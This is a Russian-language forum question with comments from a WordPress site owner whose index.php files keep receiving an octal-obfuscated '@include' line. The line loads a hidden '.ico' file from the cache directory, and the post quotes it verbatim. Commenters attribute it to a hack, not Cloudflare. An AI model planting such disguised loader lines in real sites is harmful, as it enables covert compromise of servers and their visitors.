# Тема wordpress подвёрглась ддос атаке после установки cloudflare

Tags: php, wordpress, cloudflare, cdn, dos-атака

После подключения бесплатного cdn cloudflare к сайту, добавилась тема для wordpress, установился плагин командной строки для wordpress и постоянно в файлах `index.php` в любой вложенности папок прописываются зашифрованное подключение

`@include "\057var/\167ww/w\167w-ro\157t/da\164a/ww\167/3ag\157rod.\160ro/w\160-con\164ent/\143ache\057obje\143t/.8\0719e04\1449.ic\157";`

Файлы расположены на сервере заказчика.
Как избавиться от этого?

Comment: Какой-то бред, какая тема? Какой плагин? И какое отношение это имеет к Cloudflare?

Чтобы Cloudflare нужно просто изменить NS-ы и не нужно никаких плагинов и тем. У вас скорее всего сайт просто взломали и клауд тут не причем.

Comment: Установилаь тема bootcake5 и плагин wp-cli. https://i.imgur.com/9grUTyK.png

Comment: У вас проблема с вирусами, но никак не с cloudflare